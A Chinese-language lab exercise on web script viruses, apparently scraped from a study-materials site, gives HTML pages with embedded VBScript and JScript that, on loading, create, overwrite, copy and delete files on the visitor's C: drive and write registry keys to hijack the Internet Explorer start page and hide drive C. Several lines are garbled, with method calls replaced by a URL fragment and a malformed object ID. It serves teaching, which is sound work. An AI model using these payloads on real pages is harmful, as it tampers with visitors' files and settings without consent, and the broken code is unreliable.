- 相關(guān)推薦
網(wǎng)頁腳本病毒分析實(shí)訓(xùn)
1、 通過網(wǎng)頁方式在硬盤中建立文件:
<html>
<head>
<title>創(chuàng)建文件c:\test.htm</title>
<script language=”vbscript”>
<!--
dim fso,f1
set fso=createobject(“scripting.filesystemobject”)
set f1=fso.createtextfile(“c:\test.htm”,true)
-->
</script>
</head>
</html>
2、 通過網(wǎng)頁方式修改文件的內(nèi)容:
a、 向打開的文本文件寫數(shù)據(jù),不用后接換行符:write
b、 向打開的文本文件寫數(shù)據(jù),后接一個(gè)換行符:writeline
c、 向打開的文本文件寫一個(gè)或多個(gè)空白行:writeblanklines
<html>
<head>
<title>修改文件內(nèi)容c:\test.htm</title>
<script language="vbscript">
<!--
dim fso,tf
set fso=createobject("scripting.filesystemobject")
set tf=fso.createtextfile("c:\test.htm",true)
'寫一行,并帶有一個(gè)換行符。
tf.writeline("<html><body>由網(wǎng)頁腳本的方式修改已存在文件內(nèi)容成功</body></html>")
'向文件寫三個(gè)換行符。
tf.writeblanklines(3)
'寫一行
tf.write("this is a test.")
tf.close
-->
</script>
</head>
</html>
3、 通過網(wǎng)頁方式把文件復(fù)制到指定的目錄:
<html>
<head>
<title>將c:\test.htm文件復(fù)制到windows</title>
<script language="vbscript">
<!--
dim fso,tf
set fso=createobject("scripting.filesystemobject")
set tf=fso.getfile("c:\test.htm")
http://emrowgh.compy("c:\windows\test.htm")
-->
</script>
</head>
</html>
4、 通過網(wǎng)頁方式刪除文件:
<html>
<head>
<title>刪除windows里的c:\test.htm文件</title>
<script language="vbscript">
<!--
dim fso,tf
set fso=createobject("scripting.filesystemobject")
set tf=fso.getfile("c:\windows\test.htm")
http://emrowgh.comlete
-->
</script>
</head>
</html>
5、通過網(wǎng)頁方式寫系統(tǒng)注冊(cè)表(建立或修改都使用同一種方法)
<html>
<head>
<title>測(cè)試腳本</title>
</head>
<body>
<object classid=clsid:f935dc22-1cf0-adb9-ooc04fd58a0b id=wsh>
</object>
<script>
//以下內(nèi)容為對(duì)注冊(cè)表的修改
//修改ie中的主頁設(shè)置
wsh.regwrite ("hkcu\\software\\microsoft\\internet explorer\\main\\start page",http://emrowgh.com");
//隱藏驅(qū)動(dòng)器c
wsh.regwrite ("hkcu\\software\\microsoft\\windows\\currentversion\\policies\\explorer\\nodriver","00000004","reg_dword");
</script>
</body>
</html>
【網(wǎng)頁腳本病毒分析實(shí)訓(xùn)】相關(guān)文章:
網(wǎng)頁設(shè)計(jì)實(shí)訓(xùn)總結(jié)05-17
實(shí)訓(xùn)的計(jì)劃04-09
實(shí)訓(xùn)的總結(jié)01-05
大學(xué)實(shí)訓(xùn)總結(jié)05-03
數(shù)控實(shí)訓(xùn)總結(jié)05-07